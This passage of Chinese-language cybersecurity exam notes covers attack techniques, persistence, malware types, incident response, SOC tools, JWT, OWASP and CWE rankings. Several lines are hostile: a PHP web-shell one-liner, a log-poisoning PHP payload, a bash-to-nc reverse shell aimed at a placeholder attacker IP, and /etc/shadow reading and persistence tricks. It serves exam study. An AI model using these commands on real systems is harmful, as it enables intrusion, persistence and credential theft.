|:-----|:-----|:-----------| | `whoami` | 查詢當前使用者身分 | 確認取得的權限等級 | | `id` / `groups` | 查詢使用者所屬群組 | 判斷可存取的資源 | | `uname -a` | 查詢作業系統版本 | 尋找已知的核心漏洞 | | `find / -perm -u=s -type f` | 尋找有 **SUID** 權限的檔案 | SUID 提權（以檔案擁有者身分執行） | | `cat /etc/passwd` | 列舉系統帳號資訊 | 取得帳號清單（**不含密碼**） | | `cat /etc/shadow` | 讀取密碼雜湊（需 root） | 離線破解密碼 | > `/etc/passwd` 存帳號資訊（公開可讀），`/etc/shadow` 存密碼雜湊（僅 root 可讀） ### Linux 持久化（Persistence）技巧 | 技巧 | 說明 | |:-----|:-----| | 寫入 `~/.bashrc` | 使用者登入時自動觸發（如反向 Shell） | | 寫入 `crontab` | 定期執行惡意程式 | | 寫入 `~/.ssh/authorized_keys` | 免密碼 SSH 登入（注意：不是 `known_hosts`） | | Web Shell | 上傳一句話木馬（如 `<?php @eval($_REQUEST["input"]);?>`） | --- ### 網路攻擊 | 攻擊 | 原理 | 防護 | |:-----|:-----|:-----| | DoS/DDoS | 消耗資源使服務不可用 | 流量清洗、CDN、速率限制 | | SYN Flood | 大量半開連線耗盡資源 | SYN Cookie | | ARP Spoofing | 偽造 ARP 回應，攔截流量 | DAI | | DNS Spoofing | 偽造 DNS 回應，導向惡意網站 | DNSSEC | | MITM | 插入通訊雙方之間竊聽/篡改 | HTTPS、HSTS、憑證釘選 | | Buffer Overflow | 輸入超過緩衝區大小，覆寫記憶體執行惡意程式碼 | 邊界檢查、ASLR、DEP、安全函數 | --- ### 應用程式攻擊 | 攻擊 | 原理 | 防護 | |:-----|:-----|:-----| | SQL Injection | 注入 SQL 語句操控資料庫 | 參數化查詢、輸入驗證、最小權限 | | XSS | 注入惡意腳本於網頁 | Output Encoding、CSP、HttpOnly Cookie | | CSRF | 利用已登入身分執行非預期操作 | CSRF Token、SameSite Cookie | | SSRF | 利用伺服器連內網或雲端 Metadata | 白名單驗證、禁止內網存取 | | Command Injection | 注入系統指令 | 白名單、參數化、安全 API | | LFI | 透過參數載入本地檔案（如日誌、設定檔） | 白名單驗證、禁止使用者控制檔案路徑 | ### Log Poisoning + LFI 攻擊鏈 **攻擊流程**： 1. 攻擊者以惡意 PHP 程式碼作為 SSH 登入帳號（如 `<?php system($_GET[c]); ?>`） 2. 登入失敗，但「帳號」被寫入系統日誌（如 /var/log/auth.log） 3. 攻擊者透過 LFI 漏洞載入該日誌檔 4. 伺服器解析日誌中的 PHP 程式碼並執行 5. 攻擊者透過參數（如 ?c=whoami）遠端執行任意指令 > 關鍵識別特徵：日誌中出現 `<?php` 語法作為使用者名稱 ### Reverse Shell（反向 Shell） | 項目 | 說明 | |:-----|:-----| | 原理 | 受害主機**主動連線**到攻擊者控制的機器 | | 目的 | 繞過防火牆 Inbound 限制，讓攻擊者遠端下指令 | | 常見指令 | `/bin/bash -i 2>&1 \| nc <攻擊者IP> <Port>` | | 偵測方式 | 監控異常的 Outbound 連線、檢查 crontab 與 .bashrc | --- ### 逆向工程（Reverse Engineering）與混淆（Obfuscation） > ⚠️ 注意這跟「Reverse Shell」（反向 Shell）完全不同 — 反向 Shell 是攻擊者連線手法、Reverse Engineering 是分析程式內部。 #### 逆向工程 - **定義**：把已編譯的程式（.exe / .apk / .ipa）反推回**接近原始碼**的形式，分析其行為 - **攻擊者用途**：破解授權、找漏洞、偷演算法、分析惡意程式 - **防禦方用途**：分析惡意程式樣本、行動 App 安全檢測 #### Obfuscation 混淆（對抗逆向工程）軟體開發者用「混淆」讓程式碼**難以閱讀**，提高逆向成本（注意：不是加密，只是讓人看不懂）。 | 混淆手法 | 範例 | |:-----|:-----| | 變數名打亂 | `getUserPassword` → `_a1b2c3` | | 控制流扭曲 | 加大量無意義跳轉、假 if-else | | 字串加密 | `"password"` 在執行時才解密 | | 反組譯陷阱 | 加入特殊指令讓反組譯工具崩潰 | > 💡 **記憶法**：加密是「鎖起來」（沒鑰匙打不開），混淆是「丟到資源回收堆」（東西還在,但很難找）。 #### 常見題型 - 「逆向工程」**不屬於**安全檢測項目（它是攻擊者技術，App 安全檢測指掃描漏洞） - 「混淆」目的是**提高反組譯難度**，不是壓縮體積、不是加密保護 > 📌 **與滲透測試區別**：滲透測試是「黑箱對外攻擊」，逆向工程是「白箱對內部解讀」。 --- ### 憑證相關攻擊 | 攻擊 | 中文 | 原理 | 防護 | |:-----|:-----|:-----|:-----| | Credential Harvesting | 憑證收集 | 釣魚假登入頁騙取帳密 | 安全意識訓練、MFA | | Credential Stuffing | 憑證填充（撞庫） | 用外洩帳密撞其他網站 | OTP、MFA、2FA | | Brute Force | 暴力破解 | 暴力猜測密碼 | 密碼複雜度、帳號鎖定、CAPTCHA | | Password Spraying | 密碼噴灑 | 用常見密碼對大量帳號嘗試 | 帳號鎖定、MFA | --- ### 社交工程 | 手法 | 中文 | 說明 | |:-----|:-----|:-----| | Phishing | 網路釣魚 | 偽造郵件/網站騙取資訊 | | Spear Phishing | 魚叉式釣魚 | 針對特定對象的釣魚 | | Whaling | 鯨釣（捕鯨） | 針對高階主管 | | Vishing | 語音釣魚 | 透過電話詐騙 | | Smishing | 簡訊釣魚 | 透過簡訊詐騙 | | Tailgating | 尾隨進入 | 跟隨授權人員進入管制區 | | Pretexting | 假冒身分 | 編造身分騙取信任 | | Deepfake | 深度偽造 | 深度偽造影音冒充身分 | **防禦策略**： - 安全意識訓練 - 獨立驗證管道：高風險指令透過另一管道確認 - SOD + 多重審批：敏感操作需多人核准 --- ### 惡意程式 | 類型 | 英文 | 特性 | |:-----|:-----|:-----| | 病毒 | Virus | 需宿主程式，會自我複製 | | 蠕蟲 | Worm | 獨立運作，透過網路傳播 | | 木馬 | Trojan | 偽裝成正常程式，不自我複製 | | 勒索軟體 | Ransomware | 加密檔案，要求贖金 | | 間諜軟體 | Spyware | 監控使用者行為 | | Rootkit | Rootkit | 隱藏自身，取得系統控制權 | | 後門 | Backdoor | 繞過正常認證的存取管道 | --- ### 勒索軟體 **勒索軟體防護措施**： - 多層備份策略（3-2-1 原則：3 份備份、2 種媒體、1 份異地） - 備份系統與主網分離（避免備份被一起刪除） - 應用程式白名單 - 零信任架構（限制橫向移動） - 網路區隔 - 使用者教育訓練 - EDR / 行為偵測 --- ### 威脅框架 **MITRE ATT&CK（TTP）** - Tactic（戰術）：攻擊目的（如 Initial Access、Persistence） - Technique（技術）：攻擊手段（如 Phishing、Valid Accounts） - Procedure（程序）：具體實作方式（如 APT29 使用特定釣魚郵件） | 戰術 | 中文 | 說明 | |:-----|:-----|:-----| | Reconnaissance | 偵察 | 蒐集目標資訊 | | Resource Development | 資源開發 | 開發/取得攻擊資源 | | Initial Access | 初始存取 | 首次進入目標系統 | | Execution | 執行 | 執行惡意程式 | | Persistence | 持久化 | 維持存取權 | | Defense Evasion | 防禦規避 | 規避防禦偵測 | | Credential Access | 憑證存取 | 竊取憑證 | | Lateral Movement | 橫向移動 | 在內網擴散到其他系統 | | Exfiltration | 資料竊取 | 將資料傳送到外部 | | Impact | 衝擊 | 破壞、加密、癱瘓 | **Cyber Kill Chain（網路攻擊鏈）** | 階段 | 英文 | 中文 | 說明 | |:----:|:-----|:-----|:-----| | 1 | Reconnaissance | 偵察 | 蒐集目標情報（如 OSINT、掃描） | | 2 | Weaponization | 武器化 | 製作攻擊工具（如惡意文件、Exploit） | | 3 | Delivery | 遞送 | 將武器傳遞給目標（如釣魚郵件、USB） | | 4 | Exploitation | 利用 | 觸發漏洞取得執行權限 | | 5 | Installation | 安裝 | 植入惡意程式（如 Backdoor、Web Shell） | | 6 | Command & Control | 命令與控制（C2） | 建立遠端控制通道 | | 7 | Actions on Objectives | 目標行動 | 達成最終目的（竊資、破壞、勒索） | --- > 📝 **本節相關題目共 29 題** → [前往題庫對應章節](https://hackmd.io/@hiiii/rk0t2YmaWe#31-弱點威脅分類與攻擊手法) ## 3.2 防護與應變實務 ### 網路安全設備 **防火牆類型**： | 類型 | 層級 | 特性 | |------|------|------| | 封包過濾 | L3-L4 | 檢查 IP/Port | | 狀態檢測 | L3-L4 | 追蹤連線狀態 | | 應用層閘道 | L7 | 完整檢查內容 | | NGFW | L3-L7 | 整合 IPS、應用識別 | | WAF | L7 | 專防 Web 攻擊（SQLi、XSS），規則可被繞過 | **IDS vs IPS**： | 項目 | IDS | IPS | |------|-----|-----| | 功能 | 偵測並告警 | 偵測並阻擋 | | 部署 | 旁路監聽 | 串接 | **偵測方法**： - Signature-based：準確但無法偵測未知攻擊 - Anomaly-based：可偵測未知攻擊但誤報較高 **Honeypot / Honeynet（蜜罐/蜜網）**：模擬假目標吸引攻擊者，用於偵測、分析攻擊行為 ### DNS Sinkhole（DNS 黑洞） | 項目 | 說明 | |:-----|:-----| | 原理 | 將惡意網域的 DNS 解析導向內部控制的 IP | | 效果 | 阻斷惡意連線（如 C2 通訊），不影響正常服務 | | 適用情境 | SOC 偵測到大量可疑 DNS 查詢（如 *.onion）時的即時防禦 | | 與防火牆封鎖差異 | 封鎖 53 埠會影響所有 DNS；Sinkhole 只影響特定惡意網域 | ### 端點安全 | 技術 | 說明 | 特點 | |:-----|:-----|:-----| | 傳統防毒 | 特徵碼比對 | 無法偵測未知威脅 | | EDR | 端點偵測與回應 | 行為分析、可偵測未知威脅、支援事件調查 | **EDR 核心功能**： - 行為偵測（非特徵碼） - 即時監控端點活動 - 威脅獵捕（Threat Hunting） - 事件調查與回應 **EDR 告警處理**：隔離端點網路、擷取 RAM、製作磁碟鑑識映像 **事件處理流程（NIST SP 800-61）** | 階段 | 英文 | 中文 | 說明 | |:----:|:-----|:-----|:-----| | 1 | Preparation | 準備 | 建立事件處理能力、工具、程序 | | 2 | Identification | 識別 | 偵測並確認是否為資安事件 | | 3 | Containment | 遏制 | 隔離受影響系統，防止擴散 | | 4 | Eradication | 根除 | 移除惡意程式、修補漏洞 | | 5 | Recovery | 復原 | 恢復系統正常運作 | | 6 | Lessons Learned | 檢討 | 事後檢討、改善程序 | > 💡 **事件確認後首要動作是遏制（Containment）**，不是根除也不是復原。先止血再治療。 ### 數位鑑識 **證據揮發性順序**（優先蒐集）： 1. CPU 暫存器/快取 2. RAM（記憶體） 3. 網路連線狀態 4. 執行中程序 5. 硬碟 6. 備份媒體 **完整性驗證**：製作鏡像並計算 Hash **監管鏈（Chain of Custody）**：記錄證據移轉過程 ### 營運持續與災難復原 | 計畫 | 英文 | 範圍 | |:-----|:-----|:-----| | BCP | Business Continuity Plan | 組織整體業務運營持續 | | DRP | Disaster Recovery Plan | 資訊技術系統的恢復 | | ISCP | Information System Contingency Plan | 特定資訊系統的應急反應 | > 範圍大小：BCP（整體業務）> DRP（IT 系統）> ISCP（特定系統） **BIA（Business Impact Analysis，業務衝擊分析）**： - 核心目標：確定關鍵業務流程、評估資源中斷的影響、設定復原優先級 - 產出：RTO（復原時間目標）、RPO（復原點目標）、關鍵資源清單 --- > 📝 **本節相關題目共 9 題** → [前往題庫對應章節](https://hackmd.io/@hiiii/rk0t2YmaWe#32-防護與應變實務) ## 4.1 安全維運 ### SecOps（Security Operations，現代化資安維運）從「人工監控 SIEM」走向「自動化 + AI 輔助」的維運模式。 #### 基礎四件套（已過時但仍常考定義） | 元素 | 說明 | |:-----|:-----| | SIEM（資安資訊與事件管理） | 多源日誌收集、關聯分析、告警 | | SOAR（資安編排自動化回應） | 把告警處理流程自動化（如：勒索告警 → 自動隔離主機） | | 威脅情資 | 外部 IoC / TTP 情資支援判斷 | | SOC | 人員團隊持續監控 | #### 進階工具族（2024 後新題型，**最值得加強**） | 工具 | 全名 | 解決什麼問題 | |:-----|:-----|:-----| | **EDR** | Endpoint Detection & Response | 端點行為偵測（已在 1.3 章說明） | | **NDR** | Network Detection & Response | 網路流量行為偵測 | | **XDR** | Extended Detection & Response | 整合 EDR + NDR + 雲端 + 身分,跨域關聯 | | **MDR** | Managed Detection & Response | 委外給 SOC 廠商 24/7 監控 | | **UEBA** | User & Entity Behavior Analytics | 用 AI 比對「使用者平常行為」找異常 | | **PAM** | Privileged Access Management | 特權帳號管理（已在 1.2 章說明） | | **IGA** | Identity Governance & Administration | 身分生命週期管理（申請/變動/離職） | | **EASM** | External Attack Surface Management | 從外部視角掃描公司哪些資產暴露 | | **CSPM** | Cloud Security Posture Management | 雲端組態錯誤偵測（如 S3 桶設成 public） | | **BAS** | Breach & Attack Simulation | 持續模擬攻擊驗證防禦能力 | #### 命題趨勢辨析（常考組合題） | 情境 | 對應工具 | |:-----|:-----| | 端點行為異常但網路沒事 | EDR（NDR 看不到端點） | | 想用一個工具看跨域威脅 | XDR | | 公司沒人 24/7 守 SOC | MDR（委外） | | 員工權限不知為何越來越大 | IGA（權限蔓延管理） | | 雲端設定常出包 | CSPM | | 想知道對外有多少資產暴露 | EASM | | 想驗證「現在的防禦真的擋得住」 | BAS | > 💡 **記憶法**：把 EDR 想成「保全在大樓裡」、NDR「監視大樓門口」、XDR「整合 CCTV + 門口 + 大樓 + 雲端」、MDR「請保全公司代管」、UEBA「比對誰跟平常不一樣」。 ### 日誌管理 **時間同步（NTP）**：確保各系統時間一致，日誌時序正確才能有效進行事件關聯分析 **Windows Event ID**： | Event ID | 意義 | |:---------|:-----| | 4624 | 登入成功 | | 4625 | 登入失敗 | | 1102 | 日誌被清除 | | 4720 | 新帳號建立 | **Syslog 嚴重度**（數字越小越嚴重）： | 等級 | 名稱 | |:-----|:-----| | 0 | Emergency | | 1 | Alert | | 2 | Critical | | 3 | Error | | 4 | Warning | | 5 | Notice | | 6 | Informational | | 7 | Debug | ### SIEM 功能：日誌收集、正規化、即時關聯分析、告警、合規報表 **SIEM 日誌收集方式**： | 方式 | 說明 | |:-----|:-----| | Syslog | 標準日誌協定，Linux/網路設備原生支援 | | Agent-Based | 安裝代理程式收集並傳送 | | WEF | Windows Event Forwarding，Windows 原生功能 | | API | 透過 API 整合雲端服務日誌 | ### SIEM **功能**： - 收集企業內外日誌、警報、事件 - 事件關聯分析、行為分析、異常偵測 - 依規則進行事件識別、分析和報警 - 事件儲存、查詢、報表生成、調查和取證 ### SOC 運作 **功能**： - 持續監控企業資訊系統、網路和應用 - 識別並即時回應安全事件 - 提供資安事件報告、紀錄、追蹤、分析和統計 > ⚠️ SOC 需要多種工具配合（SIEM、EDR、IDS 等），非單一產品能達成 ### SOAR **SOAR（Security Orchestration, Automation, and Response）**： | 功能 | 說明 | |:-----|:-----| | Orchestration（編排） | 整合多種資安工具協同運作 | | Automation（自動化） | 自動執行重複性任務 | | Response（回應） | 自動化事件回應流程 | ### 威脅情資（Threat Intelligence） **情資內容**： - 攻擊手法、漏洞利用方式 - 事件造成之實際損害或潛在負面影響 - IoC（Indicator of Compromise）：惡意 IP、Hash、網域 **ISAC（資訊分享與分析中心）**： | ISAC | 適用對象 | |:-----|:---------| | F-ISAC | 金融業 | | H-ISAC | 醫療業 | | TWCERT/CC | 一般企業 | **TLP（Traffic Light Protocol，紅綠燈協定）**： | 等級 | 分享範圍 | |:-----|:---------| | TLP:RED | 僅限收件者本人，不得進一步揭露 | | TLP:AMBER | 組織內部使用，必要時可分享給客戶 | | TLP:GREEN | 可於相關社群內散播 | | TLP:CLEAR | 無限制，可公開散播 | --- > 📝 **本節相關題目共 14 題** → [前往題庫對應章節](https://hackmd.io/@hiiii/rk0t2YmaWe#41-安全維運) ## 4.2 滲透測試、源碼測試、資安健診 ### 弱點修補 **弱點修補管理流程**： 1. 弱點掃描 2. 評估：風險等級、實際影響程度、是否有已知 Exploit、停機對業務影響 3. 排定修補優先序與時程 4. 測試與部署修補 5. 驗證修補成效 > ⚠️ 即使無官方 Patch，仍應評估緩解措施（如關閉服務、網路隔離） ### 測試類型 | 類型 | 測試者知識 | 特點 | |------|------------|------| | 黑箱 | 無內部資訊 | 模擬真實攻擊 | | 白箱 | 完整資訊 | 涵蓋率高 | | 灰箱 | 部分資訊 | 平衡效率與真實性 | ### 檢測技術 | 技術 | 說明 | 時機 | |------|------|------| | SAST（靜態） | 掃原始碼 | 開發初期 | | DAST（動態） | 測執行中應用 | 測試/正式環境 | | IAST（互動） | 結合 SAST + DAST | 測試環境 | | SCA（組成分析） | 掃第三方元件漏洞 | 整合 SBOM | **自動化工具侷限**：對客製化商業邏輯理解有限，需搭配人工測試 ### JWT（JSON Web Token）安全 #### JWT 結構（三段，用 . 分隔） ``` xxxxx.yyyyy.zzzzz ↑ ↑ ↑ Header.Payload.Signature ``` | 段落 | 內容 | 編碼方式 | |:-----|:-----|:-----| | Header | 簽章演算法、Token 類型 | Base64 | | Payload | 使用者資訊、過期時間、權限 | Base64（**未加密** — 任何人可讀） | | Signature | 用密鑰對前兩段簽章 | HMAC / RSA | > ⚠️ **Payload 是 Base64,不是加密**。攻擊者拿到 JWT 可以直接看到內容，**不要把敏感資料寫進 Payload**。 #### 簽章演算法（常考） | 演算法 | 全名 | 類型 | 場景 | |:-----|:-----|:-----|:-----| | **HS256** | HMAC-SHA-256 | 對稱式（共用密鑰） | 內部系統，單方簽發 | | **RS256** | RSA-SHA-256 | 非對稱式（私鑰簽章 / 公鑰驗證） | 跨組織、第三方驗證 | | ❌ none | 無簽章 | — | **絕對禁用**，任何 JWT 都會通過 | #### 常見攻擊與防護 | 攻擊 | 原理 | 防護 | |:-----|:-----|:-----| | Algorithm 為 none | 改 Header 的 alg 為 none 騙過驗證 | 後端強制檢查 alg 必須為核可清單 | | 弱密鑰暴力破解 | HS256 用簡單密鑰被破 | 密鑰至少 256 bit 隨機 | | Token 沒有過期時間 | 偷到 Token 永久有效 | 設定 exp（短效期）+ Refresh Token | | 敏感資料寫在 Payload | 攻擊者解碼直接看到 | Payload 只放 ID,敏感資料另查 | > 📌 **OWASP Top 10 對應**：JWT 安全屬 A07 Identification and Authentication Failures。 ### OWASP Top 10（2025） > ⚠️ **版本注意**：本筆記收錄 2025 版排名，但部分考題仍引用 **2021 版**編號。建議確認考試簡章採用哪個版本。 **2021 → 2025 主要變動**： | 2021 版 | 2025 版 | 變動 | |:--------|:--------|:-----| | A03 Injection | A05 Injection | 排名下降 | | A05 Security Misconfiguration | A02 Security Misconfiguration | 排名上升 | | A06 Vulnerable and Outdated Components | A03 Software Supply Chain Failures | 改名擴大 | | A10 SSRF | 併入 A01 Broken Access Control | 不再獨立 | | — | A10 Mishandling of Exceptional Conditions | 新增（社群票選） | | 排名 | 弱點 | 備註 | |:-----|:-----|:-----| | A01 | Broken Access Control | 含 SSRF（原 A10 併入） | | A02 | Security Misconfiguration | 從 #5 上升 | | A03 | Software Supply Chain Failures | 新（取代 Vulnerable Components） | | A04 | Cryptographic Failures | | | A05 | Injection | | | A06 | Insecure Design | 社群票選 | | A07 | Identification and Authentication Failures | | | A08 | Software and Data Integrity Failures | | | A09 | Security Logging and Monitoring Failures | | | A10 | Mishandling of Exceptional Conditions | 新、社群票選 | > 8 個來自統計數據，2 個來自社群票選（A06、A10） ### CWE Top 25（2025） | 排名 | CWE ID | 弱點名稱 | 簡稱 | KEV 數 | |:-----|:-------|:---------|:-----|:-------| | 1 | CWE-79 | Improper Neutralization of Input During Web Page Generation | XSS | 7 | | 2 | CWE-89 | Improper Neutralization of Special Elements used in an SQL Command | SQL Injection | 4 | | 3 | CWE-352 | Cross-Site Request Forgery | CSRF | 0 | | 4 | CWE-862 | Missing Authorization | 缺少授權 | 0 | | 5 | CWE-787 | Out-of-bounds Write | 越界寫入 | 12 | | 6 | CWE-22 | Improper Limitation of a Pathname to a Restricted Directory | Path Traversal | 10 | | 7 | CWE-416 | Use After Free | 釋放後使用 | 14 | | 8 | CWE-125 | Out-of-bounds Read | 越界讀取 | 3 | | 9 | CWE-78 | Improper Neutralization of Special Elements used in an OS Command | OS Command Injection | 20 | | 10 | CWE-94 | Improper Control of Generation of Code | Code Injection | 7 | | 11 | CWE-120 | Buffer Copy without Checking Size of Input | Classic Buffer Overflow | 0 | | 12 | CWE-434 | Unrestricted Upload of File with Dangerous Type | 危險檔案上傳 | 4 | | 13 | CWE-476 | NULL Pointer Dereference | 空指標解參考 | 0 | | 14 | CWE-121 | Stack-based Buffer Overflow | 堆疊緩衝區溢位 | 4 | | 15 | CWE-502 | Deserialization of Untrusted Data | 不安全反序列化 | 11 | | 16 | CWE-122 | Heap-based Buffer Overflow | 堆積緩衝區溢位 | 6 | | 17 | CWE-863 | Incorrect Authorization | 授權不正確 | 4 | | 18 | CWE-20 | Improper Input Validation | 輸入驗證不當 | 2 | | 19 | CWE-284 | Improper Access Control | 存取控制不當 | 1 | | 20 | CWE-200 | Exposure of Sensitive Information to an Unauthorized Actor | 敏感資訊洩露 | 1 | | 21 | CWE-306 | Missing Authentication for Critical Function | 關鍵功能缺少驗證 | 11 | | 22 | CWE-918 | Server-Side Request Forgery | SSRF | 0 | | 23 | CWE-77 | Improper Neutralization of Special Elements used in a Command | Command Injection | 2 | | 24 | CWE-639 | Authorization Bypass Through User-Controlled Key | IDOR | 0 | | 25 | CWE-770 | Allocation of Resources Without Limits or Throttling | 資源耗盡 | 0 | > **KEV**：Known Exploited Vulnerabilities，表示該類弱點已有實際被利用的漏洞數量 > > **2025 新進榜**：CWE-120（#11）、CWE-121（#14）、CWE-122（#16）、CWE-284（#19） > > CWE Top 25 與 OWASP Top 10 互補：CWE 偏向底層程式碼弱點分類，OWASP 偏向 Web 應用風險情境 --- ### 安全開發（SSDLC） | 階段 | 英文 | 安全活動 | |:-----|:-----|:---------| | 需求 | Requirements | 安全需求分析 | | 設計 | Design | 威脅建模（Threat Modeling） | | 開發 | Development | 安全編碼、程式碼審查（SAST）、第三方元件檢測（SCA） | | 測試 | Testing | 滲透測試、弱點掃描（DAST）、互動式測試（IAST） | | 部署 | Deployment | 安全組態、環境強化（Hardening） | | 維運 | Operations | 監控、修補管理、WAF | **安全編碼原則**： | 攻擊類型 | 防禦方式 | |:---------|:---------| | XSS | Filter Input + Escape Output | | SQL Injection | Prepared Statement（參數化查詢）+ 輸入過濾 | | Command Injection | 白名單驗證、避免直接串接系統指令 | | 檔案上傳 | 限制副檔名、專屬目錄、設定不可執行 | > ⚠️ **前端驗證不可靠**：攻擊者可繞過前端直接發送請求，驗證必須在後端執行 ### 威脅建模（Threat Modeling） | 模型 | 說明 | |:-----|:-----| | STRIDE | 微軟提出，識別六大威脅類型 | | DREAD | 風險評分模型 | | VAST | 視覺化、敏捷式威脅建模 | --- > 📝 **本節相關題目共 18 題** → [前往題庫對應章節](https://hackmd.io/@hiiii/rk0t2YmaWe#42-滲透測試源碼測試資安健診)